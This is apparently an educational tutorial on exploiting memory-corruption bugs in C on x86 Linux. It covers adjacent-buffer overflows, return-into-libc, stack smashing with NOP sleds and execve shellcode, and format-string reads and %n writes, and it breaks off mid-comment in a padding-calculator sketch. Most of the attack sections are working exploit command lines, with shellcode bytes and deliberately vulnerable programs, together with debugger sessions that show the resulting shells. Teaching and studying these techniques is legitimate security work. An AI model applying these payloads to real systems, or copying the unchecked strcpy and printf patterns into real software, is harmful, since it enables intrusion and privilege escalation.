The goal of exploitation is simply to make a computer system do something you want it to do that it is not supposed to do. This could mean almost anything, but a few interpretations are common. When attacking a remote system, the goal is most often to run code on it. The code may run as a non-privileged user, but anything is a start. When you can already run code on a system, that is, when attacking it locally, the goal is usually more control over the system. On multiuser systems this means becoming the administrative user. Other times it may involve getting a web store to sell you something for nothing, or returning database entries that you want information on. It really is anything that you want to do but are not allowed to do by the system.
A classic method when exploiting programs is escalating privileges. The idea here is that different programs run with different sets of permissions. If you can get a program with more permissions than you to run some bit of code, then you effectively have all the privileges of the program that you are exploiting. On many machines exploiting a system process would mean that you have full administrative access on that machine.
The following is a list of general levels of access to a system. Exploitation is figuring out a way to get a higher level of access from something that has it, or can give it to you.
The basic memory overflow is where most exploit writers start their careers. To the computer, memory is not a set of variables, arrays, and code. It is one giant addressable street, with a byte stored at every address, be it code or data. This layout means that the variables of one function are often stored next to each other in memory. As a consequence, if the program does not interact with memory correctly, it is possible to get it to write to things it should not be writing to.
Take this program for example.
#include <stdio.h>

int main(int argc, char ** argv)
{
    char str2[8];
    char str1[8];
    str1[8] = 'A';   /* one byte past the end of str1 */
    str1[9] = 0;
    printf("%s\n", str2);
    return 0;
}
If you compile the above program on most x86/Linux machines and run it, the program will print out 'A'. As you can see, we added the character 'A' to str1, not str2, yet str2 is what was printed. How did that 'A' get into str2? The two variables are adjacent in memory, and arrays in C do not tell the programmer when a write goes past the end of the array.
You might wonder how this technique could possibly be used to exploit a program. After all, what programmer would do something so obviously incorrect as the above example? Well, here is a small program that might actually provide useful functionality, but could be exploited with the basic memory overflow technique.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char ** argv)
{
    char str2[32];
    char str1[32];
    if (argc <= 1)
        return 0;
    strcpy(str2, "echo This is a shell command");
    strcpy(str1, argv[1]);   /* no length check on the argument */
    printf("Argument1: %s\n", str1);
    system(str2);
}
Normally this program will print out the first argument passed to it, and run the command echo This is a shell command via the system shell. The problem arises if someone specifies an argument on the command line that is longer than the 32 bytes of str1. In that case strcpy will keep on copying and not stop until the whole string is copied.
For reference this is the layout of the memory.
[-------str1-------][------str2-------]
Normally str1 will have the contents of argv[1] (the first argument) and a null byte after the copy. However, if an attacker supplies enough padding to fill up str1, followed by a command they want to run so that it starts at the beginning of str2, then the program will run whatever command string ends up in str2.
The attack:
$ gcc testfile2.c
$ ./a.out Test
Argument1: Test
This is a shell command
$ ./a.out aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaapwd
Argument1: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaapwd
/home/mike
$
This same technique can even be used to change the values of other kinds of variables. Let's take the case where an integer is stored after one of our strings, and we can overflow into it. On 32 bit machines, integers are 4 bytes. In the Intel architecture, which is little endian, the bytes are stored with the least significant byte first. What does this mean? Well, if you have the number 1 in an integer variable, in memory it would look like this.
0x01 0x00 0x00 0x00
We also know that characters are exactly one byte. This tells us that if we overwrite the first byte of our integer with a space character, the front byte will be 0x20, the hexadecimal code for the ASCII space character. It may be helpful to have an ASCII chart on hand, along with a calculator for converting decimal to hexadecimal. Don't worry about knowing the entire table, as we will talk about a better method of choosing characters to insert in a bit. For now let's look at another vulnerable program.
#include <stdio.h>
#include <string.h>

int main(int argc, char ** argv)
{
    int test1;
    char str1[8];
    if (argc <= 1)
        return 0;
    test1 = 0;
    strcpy(str1, argv[1]);   /* copies the first argument, unchecked */
    if (test1 == 0)
        printf("test1 is zero\n");
    else
        printf("test1 is decimal %d hex %x\n", test1, test1);
    return 0;
}
So, now that you know how the memory is laid out, you see that there will be 8 bytes of str1, then 4 bytes for the test1 integer. The plan will be to provide a 9 character argument to the program: eight to fill str1, and one to change the value of test1. Here is a sample run with such an argument.
$ gcc testfile3.c
$ ./a.out aaaaaaaa9
test1 is zero
$
This was not what we expected. The character '9' should have been written to the first byte of test1. The reason is somewhat obscure: in certain cases the compiler optimizes where it stores variables in memory. It is often much faster to waste a little space and place variables on a 4 or 8 byte boundary than to pack them right next to each other and have one cross a boundary. We could keep guessing sizes until we find the right one, but the proper technique, and one that will be faster in more advanced cases, is to use a debugger. The one of choice here will be gdb, so let's take a hack at it and find out how far the start of test1 is from the start of str1.
$ gcc -g t3.c
$ gdb ./a.out
(gdb) break main
Breakpoint 1 at 0x80483d4: file t3.c, line 8.
(gdb) run
Starting program: /home/user/a.out
Breakpoint 1, main (argc=1, argv=0xbffff534) at t3.c:8
8 if (argc <= 1)
(gdb) print &test1
$1 = (int *) 0xbffff4e4
(gdb) print &str1
$2 = (char (*)[8]) 0xbffff4d8
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
What we are doing here is compiling the program with debugging support with the -g option. This allows us to use the debugger with the symbolic names of the variables. We open the debugger on our new executable. Then we tell it to break execution when it reaches the main function. Issuing the run command tells gdb to start running the program, until it hits a breakpoint. Once it is stopped, everything should now be loaded into memory, so we can examine the addresses of the variables with the print &variable statement. Doing that on both variables, and subtracting the two, shows that they are 0xc, or 12 apart. That means we have to put in 12 characters before we hit test1. Let's try out that theory.
$ ./a.out abcdabcdabcd
test1 is zero
$ ./a.out abcdabcdabcda
test1 is decimal 97 hex 61
Perfect! We were able to precisely determine the offset between the two variables and correctly use that to manipulate the values of test1.
Now that you have made it through the basic memory overflow technique, let's look at what else you can potentially overflow in memory. The previous attacks were interesting, but they have one potential issue for an attacker: the attacker must be able to change a variable in a way that benefits them in the later code. They face numerous problems: not having the code, the code not doing anything beneficial in any case, and the possibility that the variable being overflowed has no other variables after it.
What attackers would often want is a quick and easy way to completely gain control of the program by overflowing some other important part of the program. This isn't as hard as it sounds if we look at how the compiler implements function calls.
As you know from programming, every time you call a function it has its own copy of its local variables. With a call to a recursive function that goes 200 iterations deep, there should be 200 copies of its local variables in memory somewhere. There should also be an easy way of addressing each of these, and a way to return to where you were after the function is done executing. A quick examination of how flow control works shows that you enter one function from another and return in exactly the reverse of the order the functions were called in. So if you called func1, then it called func2, and that called func3, the return order is func3 to func2 and then back to func1. This is a stack, and it is exactly how the computer implements it.
The basis of a function's local memory space is the stack frame. The start of the stack frame is stored in a register called ebp, or the base pointer. Whenever a program wants to look up a local variable, it does so by taking the base pointer address plus some constant offset. Instructions are executed by the processor at whatever memory location the register eip is pointing to. Ah ha, you think! Just overwrite eip with something of our choosing in order to take over flow control for the program. It's not quite that simple, though, because registers are not part of the addressable memory space. How you actually do change eip isn't that much more complicated, though.
Thinking about this implementation of a function as a frame starting at wherever ebp points to and code executing at whatever eip points to means that these two important values must be saved whenever we call another function and easily restored when that function returns. This task is easily solved by pushing the two register values onto the top of the stack, or after the function's frame.
Here is the function frame layout in memory.
<-Bottom of stack Top of stack ->
[var1][var2][var3][padding][var4][var5]
^
----- ebp register points here
eip register points to some point in function code elsewhere in memory.
From this we see that the variables are expressed as a negative offset from ebp. We can verify this from the disassembly of some code in gdb. Comparing a variable to zero looks like this.
0x08048401
Moving on from here, we see that when we call a function, we must preserve ebp and eip so we can continue execution where it left off. To do this the machine pushes both values onto the end of the stack: the call instruction pushes the return address (the saved eip), and the first instructions of the called function push ebp.
After the push, the memory looks like this.
<-Bottom of stack Top of stack ->
[var1][var2][var3][padding][var4][var5][savedeip][savedebp]
^
ebp register points here now---------------------------
eip register points to some point in function code elsewhere in memory.
What we see here is that the new frame starts at [savedebp] and continues on. This provides an interesting opportunity. If, in the function we just called, we could overwrite the saved value of eip to point somewhere else, we could take control of the program. Let's look at the function frame after we get into the other function.
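#include <stdio.h>
#include <stdlib.h>

void func1()
{
    printf("Hello World!\n");
    exit(1);
}

int main(int argc, char ** argv)
{
    int * x;
    x = (int *)&x + 2;   /* two ints (8 bytes) past x itself */
    *x = (int)func1;     /* overwrite what is stored there with func1's address */
}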
If you compile and execute this program with gcc/x86/linux you will have the string Hello World! printed to the screen. How is this possible? We made the pointer equal to its own location, and forwarded it by two. It should be in the middle of the x pointer, right? Well, that's something that can really bite you when working with pointers in C. When you add a number to a pointer in C, it doesn't add one byte, it adds one unit length for the type the pointer points to. In this case the pointer is to an int, and ints are 4 bytes long, so we actually forwarded the pointer by 8 bytes, or exactly onto the saved eip. We then overwrite what is at that address with the address of func1. So when main returns, instead of returning into the startup code that called it, it returns to func1.
You might be thinking, well, how useless is that! Who cares if you can return into some other function? You won't be able to pass variables, and even if you could, what useful functions are there to return into? Well, you actually can pass arguments to functions, since all they do is get them off the stack. Let's give it a try with a modified program.
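#include <stdio.h>
#include <stdlib.h>

void func1(int x)
{
    printf("Hello World! %d\n", x);
    exit(1);
}

int main(int argc, char ** argv)
{
    int * x;
    x = (int *)&x + 2;
    *x = (int)func1;     /* saved eip now points at func1 */
    x = (int *)&x + 4;
    *x = 0x1;            /* the slot func1 reads its argument from */
}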
When we compile and run this program, Hello World! 1 is printed out! This is a trivial case, but what useful function could we return into? A quick look around libc and we remember that the system(char *) call will run the string you pass to it as if you typed it into the shell. We pass strings by passing the address of the start of their character array, so let's try to return into system and make it run /bin/ls.
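#include <stdio.h>
#include <stdlib.h>

int main(int argc, char ** argv)
{
    int * x;
    x = (int *)&x + 2;
    *x = (int)system;      /* return into system instead of func1 */
    x = (int *)&x + 4;
    *x = (int)"/bin/ls";   /* address of the command string as the argument */
}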
If we compile and run this, it does exactly what we thought it would! It runs /bin/ls. You may be wondering why we added 4 to the address of x instead of 1, 2 or 3. Just remember that we are adding to the actual location of x in main, not to wherever x pointed after the first assignment. There are also 4 bytes of space between the overwritten return address and the first argument; that slot is where the called function expects to find its own return address. This is all great because we are just using C's linker to get all the addresses automatically and not doing any overflows from the command line. So let's try to exploit one of these programs from the command line.
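#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char ** argv)
{
    char str1[8];
    char * env1 = getenv("VAR1");
    char * env2 = getenv("VAR2");
    printf("address of env2 0x%x\n", (unsigned int)env2);
    printf("address of system 0x%x\n", (unsigned int)system);
    strcpy(str1, env1);   /* unchecked copy of VAR1 into an 8 byte buffer */
}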
Running the program we get the following output.
$ VAR1=h VAR2=h ./a.out
address of env2 0xbffff69d
address of system 0x8048320
$
From what we have learned before, this means we want to change the saved eip to the address of system, then have 4 bytes of blank space, then the address of env2, which we will have set to /bin/sh. So we will have a string of length 8 to fill str1, 4 bytes to get past the saved ebp, 4 bytes that are the address of system, another 4 bytes of nothing, then 4 bytes that are the address of VAR2. So let's build one based on the values we have above.
$ VAR1=`perl -e 'print "AAAAAAAAAAAA\x20\x83\x04\x08AAAA\x95\xf6\xff\xbf"'` VAR2=/bin/sh ./a.out
address of env2 0xbffff697
address of system 0x8048320
sh: line 1: 2=/bin/sh: No such file or directory
Segmentation fault
$
That didn't work. We made the string in VAR1 just as described, and we wrote the addresses in little endian form, everything we should have done, but it didn't work. The problem, if we look closer, is more subtle. The address of env2 changed! Why was that? It happened because we added more things to the environment, which pushed our string back. The error message shows it: system was handed a pointer two bytes before our string, so it tried to run 2=/bin/sh. So let's rerun the exploit string with the new address value.
$ VAR1=`perl -e 'print "AAAAAAAAAAAA\x20\x83\x04\x08AAAA\x97\xf6\xff\xbf"'` VAR2=/bin/sh ./a.out
address of env2 0xbffff697
address of system 0x8048320
sh-2.05b$ exit
Segmentation fault
$
It worked that time, and we got a shell. If we were so inclined to do so, we could have used gdb to obtain the addresses for system and env2 like we did when we first started exploiting memory overflows. For further information please see the Phrack article on return into libc exploits at http://www.phrack.org/show.php?p=58&a=4.
The previous technique described was the return into libc technique. It is often described as more advanced than the technique we will learn here, but that is an arguable point. The advantage of that technique over this one is that it lets you take over a program running on a system that has a non executable stack patch. Such a patch is basically a cheap way to stop the kind of exploits that I will talk about here, where we put machine code on the stack and point the return address at it. Although this technique is defeated by a non executable stack, not many systems have such a security mechanism. Also, if libc's system function is not loaded into memory, then you will have to go through the trouble of assembling a series of function calls that will do exactly what you want. It is often easier to just put some machine code into the buffer you are overflowing and run that.
From the earlier article this is what a function frame looks like.
<-Bottom of stack Top of stack ->
[var1][var2][var3][padding][var4][var5]
^
----- ebp register points here
When you call a function, it then looks like this.
<-Bottom of stack Top of stack ->
[var1][var2][var3][padding][var4][var5][savedeip][savedebp][var1][var2]...
^
ebp register points here now---------------------------
Variables are written right to left in this notation.
So if we want to run our own machine code, we will overflow var1 or var2 with a string that has machine code in it, overwrite savedebp, overwrite savedeip with the address of var1 or var2, and wait for the function to return and start executing the code we provided. There are several challenges with this technique though. The first challenge is the machine code. In order to get strcpy to keep going, it must not encounter any 0 bytes, or it will think it hit the end of the string. You also must provide the exact address of var2, or the CPU will start executing at an incorrect place and the program will most likely crash.
So here's the list.
1) Machine code with no null bytes
2) Exact address of variable in EIP
Solving the first problem is beyond the scope of this article, and requires extensive experience in writing assembly. There is plenty of readily available shellcode for download, along with articles that describe how to write it in a position independent manner and without null bytes.
The second problem is more tractable for us. There is a way to use a more approximate address for the shellcode and still have it run. Since the buffers we are going to overflow are often quite long relative to the shellcode, we have to pad the extra space with something. Instead of padding with an arbitrary character, we can extend the shellcode with a long prefix that does nothing until execution reaches the actual code. The Intel architecture provides just this mechanism with the NOP instruction. NOP stands for No-OPeration, and it is one byte in length, that byte being 0x90. So if we provide a bunch of 0x90 bytes before the shellcode, we can return to anywhere among those NOPs, and the CPU will keep executing them until it hits the shellcode.
Locating the saved EIP relative to the variable is a much easier problem if we use a debugger. Since the addresses of variables are hard-coded into the program as offsets relative to ebp, they will always be at that same offset from ebp. From the previous stack frame pictures, we see that ebp points to the saved ebp, and right behind that is the saved eip. So all we have to do is find out how far the variable is from ebp, add 4 bytes to that, and we are pointing at the saved eip. So let's take a look at a vulnerable program.
#include <stdlib.h>
#include <string.h>

int main(int argc, char ** argv)
{
    int x,y,z;
    char buf[512];
    char * env = getenv("VAR1");
    if (env == 0)
        return 0;
    strcpy(buf, env);   /* unchecked copy of VAR1 into buf */
}
Now we have a program that has a buffer, some extra variables in the way, and a vulnerable strcpy. Let's find out where EIP is, and where buf is so we can return into it.
$ gcc -g t6.c
$ gdb a.out
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483d7: file t6.c, line 8.
(gdb) run
Starting program: /home/user/a.out
Breakpoint 1, main (argc=1, argv=0xbffff534) at t6.c:8
8 char * env = getenv("VAR1");
(gdb) print &buf
$1 = (char (*)[512]) 0xbffff2d0
(gdb) info registers ebp
ebp 0xbffff4e8 0xbffff4e8
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
So we have found that the difference between ebp and buf is 0x4e8-0x2d0, or 0x218 (536 in decimal). That means the saved ebp is 0x218 bytes away from buf, and the saved eip is just 4 bytes past that, at 0x21c bytes (540 decimal). This has also given us the address we want to put in there, the address of buf, or 0xbffff2d0. The address of buf won't always be this; it will change a bit when we start putting environment variables in memory, but we will be able to guess at it with this as a starting point and let the NOPs take care of the rest. First let's get some shell code.
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is the default phrack 49-14 shellcode by aleph1. It is 45 bytes long. Now we can do our calculation of how to construct the exploit code. The saved EIP is 540 bytes from buf. The last 4 bytes will be our guess as to the start of buf. The 4 bytes before that will be some character to overwrite the saved ebp. This gives us 536 bytes left. The last 45 bytes of that will be the shell code, so that makes 491 bytes of NOPs at the beginning of the buffer. Here is how we will print it out with perl.
$ VAR1=`perl -e 'print "\x90"x491,"\xeb\x1f\x5e\x89\x76", "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3", "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc", "\xff\xff\xff/bin/shAAAA\xd0\xf2\xff\xbf"'` ./a.out
sh-2.05b$ exit
$
It worked, and on the first try, even though the actual address of buf had changed a little. In general you may have to adjust the address, usually by subtracting from it, and quite often in increments of about half the size of the exploit string. In this case, by adding a print statement to the vulnerable program, I discovered that the real address of buf was 0xbffff160; the exploit still worked because the guessed address landed in the NOPs.
In your travels it may be useful to get a core dump to see if you overwrote EIP. In this case you should attempt to overwrite it with a character, such as 'A'. In order to get a coredump you may have to issue the command ulimit -c unlimited. You will get the message Segmentation fault (core dumped) if a corefile was dumped. To use it run gdb ./a.out core.#### where .#### is the number of the pid of the process, although some systems just leave it as core. When in gdb type info registers eip. It will show 0x41414141 if you have correctly overflowed the saved eip register with 'A's and the function returned. If you overflow it with an actual address, it probably won't show anything meaningful. One strategy to use when trying to find experimentally in this manner where the saved EIP is located, is to use other characters, and look which characters EIP is set to in the core dump.
Here is a sample session using a core file to locate the saved eip.
$ VAR1=`perl -e 'print "A"x544'` ./a.out
Segmentation fault (core dumped)
$ ls core*
core
$ gdb ./a.out core
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
Core was generated by `./a.out'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb) info registers eip
eip 0x41414141 0x41414141
(gdb) quit
$
The classical paper on buffer overflows is at http://www.phrack.org/show.php?p=49&a=14.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char ** argv)
{
    char * env = getenv("VAR1");
    char stz[1024];
    if (env == 0)
        return 0;
    strncpy(stz, env, 1024);
    stz[1023] = 0;
    printf(env);   /* user-controlled string used as the format */
}
It is possible to view any memory location with this code. To do so you need to determine how far away the string is in the stack. This is easy because we can examine the stack by sending in %08x format specifiers to read ints off the stack. A sample string to read off the location in the stack will look like this AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x... All the user has to do is look where 41414141 occurs, and this is the beginning of the string. What use is this? Well if we specify some other bytes there and use %s, it will be treated like a pointer! Let's give this a try.
$ VAR1=`perl -e 'print "AAA0%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"'` ./a.out
AAA0bffff66e.00000400.00000000.00000005.400008fc.40000258.40000000.30414141.78383025
$
So it appears that the 8th specifier leads to the front of the string. So now if we replace the 8th specifier with %s, and the first 4 characters with an address in little endian notation, we can get printf to print out whatever is at that address up to a null byte.
$ VAR1=`perl -e 'print "\x73\xf6\xff\xbf%08x.%08x.%08x.%08x.%08x.%08x.%08x.%s"'` ./a.out
söÿ¿bffff675.00000400.00000000.00000005.400008fc.40000258.40000000.1=söÿ¿%08x.%08x.%08x.%08x.%08x.%08x.%08x.%s
$
Replacing the 8th specifier with %s, and having the start of the string be a pointer to env, caused the original VAR1 environment variable to be printed out at the end of the string! Now for a moment let's look at some other code that is vulnerable to a format string attack.
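#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void func1()
{
    printf("Hello, World!\n");
    exit(1);
}

int main(int argc, char ** argv)
{
    char stz[64];
    char * env = getenv("VAR1");
    if (env == 0)
        return 0;
    if (strlen(env) > 64)
        return 0;
    printf("func1 at %x\n", (unsigned int)func1);
    sprintf(stz, env);   /* env is the format string, so its output can exceed 64 bytes */
}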
At first glance it appears that an overflow is not possible with this code, as the length of env is checked. This assumption is incorrect though, because, as we previously witnessed, a small specifier in a format string can produce a large output. Say we specify %100x in $VAR1: the program will crash with a segmentation fault. So before we try to exploit this, let's see where the saved EIP is relative to stz.
$ gdb ./a.out
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804844c: file t8.c, line 12.
(gdb) run
Starting program: /home/user/a.out
Breakpoint 1, main (argc=1, argv=0xbffff514) at t8.c:12
12 char * env = getenv("VAR1");
(gdb) print &stz
$1 = (char (*)[64]) 0xbffff480
(gdb) info registers ebp
ebp 0xbffff4c8 0xbffff4c8
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
0x4c8-0x480 gives us 0x48, or 72 decimal. That means we should be able to do %71d and have it not crash, but %72d should overwrite one byte of the saved ebp with a null byte. %76d should overwrite the saved ebp completely, and one byte of the saved eip with a null. Testing this out, the theory proves correct, and the program crashes as soon as we use %76d. (Sometimes it may crash earlier, if a corrupt ebp leads to such a situation when it is restored.) It is not too difficult to test the theory of overwriting the saved EIP. Let's try a string of %76xAAAA. The %76x pads its output to 76 characters just as %76d does, so it should write 76 bytes, and AAAA will be placed over the saved eip.
$ export VAR1=%76xAAAA
$ gdb ./a.out
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
(gdb) run
Starting program: /home/user/a.out
func1 at 8048424
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers eip
eip 0x41414141 0x41414141
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
Okay, now that we see it's possible, let's replace the AAAA with the address of func1 that we are printing out.
$ export VAR1=`perl -e 'print "%76x\x24\x84\x04\x08"'`
$ ./a.out
func1 at 8048424
Hello, World!
$
It is now a trivial exercise to extend this into a technique where we can run shellcode in our string. All we have to do is tack the shellcode onto the end of our string, perhaps with some NOP instructions in front, and return into the NOPs. Finding the return address is even easier if you can print things off the stack, as the 0xbf...... values are saved ebp pointers, or addresses very close to where you are trying to hit. You can use them as a starting point.
Let's give it a try. Here is a slightly modified program.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char ** argv)
{
    char stz[64];
    char * env = getenv("VAR1");
    if (env == 0)
        return 0;
    if (strlen(env) > 64)
        return 0;
    printf("stz at %x\n", (unsigned int)stz);
    sprintf(stz, env);
}
The exploit string will look something like this, %76xAAAAshellcode. The easy thing to do would be to modify the exploit that we used in the previous section.
$ export VAR1=`perl -e 'print "%76xAAAA","\xeb\x1f\x5e\x89\x76", "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3", "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc", "\xff\xff\xff/bin/sh"'`
$ ./a.out
stz at bffff460
Segmentation fault
$
The trick now is to make the address that we return to equal to stz+76+4. With the address printed out here, 0xbffff460, that would be 0xbffff4b0. So let's run that again with the computed value for the return address.
$ export VAR1=`perl -e 'print "%76x\xb0\xf4\xff\xbf","\xeb\x1f\x5e\x89\x76", "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3", "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc", "\xff\xff\xff/bin/sh"'`
$ ./a.out
stz at bffff460
sh-2.05b$ exit
$
Once again we have successful exploitation. It's not yet time for celebration, though. The first program we listed is not exploitable using this technique! Let's look at it once again.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char ** argv)
{
    char * env = getenv("VAR1");
    char stz[1024];
    if (env == 0)
        return 0;
    strncpy(stz, env, 1024);
    stz[1023] = 0;
    printf(env);
}
What we really need in this program is the ability to overwrite the saved EIP, but there isn't a way to make the format string grow in memory. Take a moment to recall what we did with printing out any location of memory. We were able to create arbitrary pointers and read from them. Well, it just so happens that there is another format specifier that lets us write to a pointer. That specifier is %n, and it writes the number of characters printed so far to the address given by its corresponding argument. What use is that? Well, we do control how many characters have been printed so far with the %###d format specifier. That alone isn't going to let us change the saved eip to something useful. EIP is usually a number well into the millions, and printf just isn't going to print that many characters for us. The trick is to issue multiple writes that overlap in a manner that is beneficial to us. Remember that little endian notation you have to write all the addresses in? Now it will benefit us. Each time, we will increment the location we write to by one byte, with the end result being four consecutive bytes that correspond to the least significant byte of each int written. This sounds somewhat complicated, so just take a look at this picture.
saved eip
41414141
08000000          first write
  04000000        second write
    dd000000      third write
      ee000000    fourth write
0804ddee          result in saved eip
Now that looks something more like a real return address. So how will we exploit it? We'll create 4 pointers that correspond to the addresses we wish to write to, and then we will carefully control the last byte of the number of characters we have written.
A sample exploit string:
AAAABBBBCCCCDDDD%08x%08x%08x%08x%08x%08x%08x%n%8d%n%10d%n%80d%n
This exploit string has 4 pointers for the 4 writes, and some %x specifiers to step past the preceding arguments so that the first %n takes the first pointer as its argument. Also included are %###d specifiers to control the number of characters printed. Before each %n, the number of characters printed so far, modulo 256, must equal the byte we want to write. If that value is currently less than the target byte, we use %###d where ### is the difference between the two. If we have already passed the target byte, we must add enough to wrap around to it in modulo 256 arithmetic. Keep in mind that each %###d also consumes one argument, so in a working string a filler word has to sit between consecutive pointers for the later %n specifiers to line up.
Let's make some minor modifications to the program to enable easy exploitation.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void func1()
{
    printf("Hello World!\n");
    exit(1);
}

int main(int argc, char ** argv)
{
    int x;
    char * env = getenv("VAR1");
    char stz[1024];
    if (env == 0) return 0;
    printf("x: %x\n",&x);
    printf("func1: %x\n",func1);
    strncpy(stz,env,1024);
    stz[1023] = 0;
    printf(env);
}
Once again let's find the offset between x and eip.
$ gdb a.out
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048457: file t10.c, line 14.
(gdb) run
Starting program: /home/user/a.out
Breakpoint 1, main (argc=1, argv=0xbffff594) at t10.c:14
14 char * env = getenv("VAR1");
(gdb) print &x
$1 = (int *) 0xbffff53c
(gdb) info registers ebp
ebp 0xbffff548 0xbffff548
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
0x548-0x53c = 0xc, or 12 decimal, so x sits 12 bytes below the saved ebp. The saved eip is stored 4 bytes above that, so we should add 12+4 to the address of x to get to the saved eip. Let's apply this.
$ export VAR1=`perl -e 'print "AAAABBBBCCCCDDDD%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"'`
$ ./a.out
x: bffff54c
func1 8048424
AAAABBBBCCCCDDDDbffffe44.00000400.00000000.00000005.400008fc.40000258.40000000.41414141.42424242.43434343.44444444
$
We'll replace AAAA, BBBB, CCCC and DDDD with pointers to 0xbffff54c+12+4 = 0xbffff55c and the three bytes that follow it (+1, +2, +3). We'll also change the last four specifiers to %n.
$ export VAR1=`perl -e 'print "\x5c\xf5\xff\xbf\x5d\xf5\xff\xbf\x5e\xf5\xff\xbf\x5f\xf5\xff\xbfaaaaaaaaa%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n.%n.%n.%n"'`
$ ./a.out
x: bffff54c
func1 8048424
Segmentation fault (core dumped)
$ gdb ./a.out core
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
Core was generated by `./a.out'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x5b5a5958 in ?? ()
(gdb) quit
$
So far we have succeeded in modifying eip. Now let's change those values of 0x58 0x59 0x5a 0x5b to 0x24 0x84 0x04 0x08 (the address of func1, least significant byte first). First, 0x58 + 0xCC = 0x124, which is 0x24 mod 256. 0xCC is 204 in decimal, so we replace the %08x right before the first %n with %204d. Because the 8 characters that the %08x used to print are now gone, we also add 8 characters of padding to keep the count balanced. The same calculation is then repeated for each of the remaining three bytes. This is the tedious part, but continued computation will lead to the correct address being written into the saved eip.
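The remaining bytes follow the same modular arithmetic, which is easy to get wrong by hand. The sketch below is one way to compute the paddings. The helper names pad_for_byte and plan_pads are hypothetical, and the code assumes that nothing other than the %###d output is printed between consecutive %n writes (the "." separators used in the strings above would each add one more character). Paddings smaller than 12 are bumped by 256, because %###d only sets a minimum width and a 32-bit int can print as up to 11 characters.

```c
/* Smallest width that is always honoured exactly by %<width>d:
   a 32-bit int prints as at most 11 characters ("-2147483648"). */
#define MIN_SAFE_WIDTH 12

/* Padding to print so that (printed + padding) % 256 == target. */
unsigned pad_for_byte(unsigned printed, unsigned char target)
{
    unsigned pad = (target - (printed & 0xff)) & 0xff;

    if (pad < MIN_SAFE_WIDTH)
        pad += 256;     /* wrap around once more instead */
    return pad;
}

/* Fill pads[0..3] with the paddings that make four successive %n
   writes store the bytes of addr, least significant byte first.
   printed is the character count just before the first padding. */
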